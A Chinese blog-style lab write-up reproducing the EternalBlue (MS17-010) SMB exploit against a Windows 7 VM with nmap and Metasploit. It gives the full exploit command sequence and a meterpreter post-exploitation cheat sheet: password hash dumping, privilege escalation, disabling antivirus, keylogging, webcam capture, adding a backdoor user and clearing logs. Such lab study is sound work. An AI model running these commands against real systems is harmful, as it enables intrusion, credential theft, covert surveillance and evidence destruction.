漏洞复现-永恒之蓝(MS17-010)

1、永恒之蓝(Eternal Blue)

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

2、复现环境

角色操作系统IP地址
攻击机kali192.168.126.131
靶机Windows 7 家庭普通版192.168.126.147

注意:VMware Workstation pro16安装win7靶机安装VWware tools时提示驱动无法自动安装,是因为微软更新了驱动程序签名算法,2019年开始弃用SHA1,改用SHA2,所以要打kb4474419补丁,但是打上补丁后永恒之蓝漏洞会被修复,所以安装完tools后需要把补丁卸载

3、漏洞复现

  • 主机发现

    • 利用kali的nmap进行扫描

      nmap 192.168.126.147
      

      扫描到开放了445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。

      在这里插入图片描述

  • 使用msf框架

    • 在kali终端输入

      # 进入msf模板库
      msfconsole
      
      # 寻找MS17-010相关模板库
      search ms17-010
      

      在这里插入图片描述

    • 进入msf模块

      • 使用auxiliary/scanner/smb/smb_ms17_010 模块扫描靶机是否存在该漏洞

        # 选择使用exploit/windows/smb/ms17_010_psexec模块
        msf6 > use auxiliary/scanner/smb/smb_ms17_010
        

        在这里插入图片描述

      • 查看模块需要配置的参数

        show options
        

        在这里插入图片描述

        图中Required值为yes的对应Current Setting都需要填写

      • 设置参数后扫描

        RHOSTS 参数是要探测主机的ip或ip范围
        设置攻击目标ip:

        # 设置目标主机IP
        set rhosts  192.168.126.147
        
        # 扫描
        run
        

        在这里插入图片描述

        提示主机容易被攻击

      • 使用exploit/windows/smb/ms17_010_eternalblue攻击模块

        # 使用攻击模块
        use exploit/windows/smb/ms17_010_eternalblue
        
        # 查看漏洞信息
        info
        
        # 查看可以攻击的系统
        show targets
        
        # 查看该漏洞下可以使用的payload
        show payloads
        
        # 查看需要设置的参数
        show options
        
        # 设置payload(默认:payload/windows/x64/meterpreter/reverse_tcp)
        set payload windows/x64/meterpreter/reverse_tcp
        
        # 设置目标IP
        set rhosts 192.168.126.147
        
        # 执行攻击
        run
        

        在这里插入图片描述

        在这里可以执行文件上传下载,获取截屏,获取密码,使用摄像头,后门持久化等操作

4、后渗透阶段

在meterpreter > 中我们可以使用以下的命令来实现对目标的操作:
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
hashdump        	#导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\               #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root         #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test     #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              	#查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件    #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
clearev                      #清除日志
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值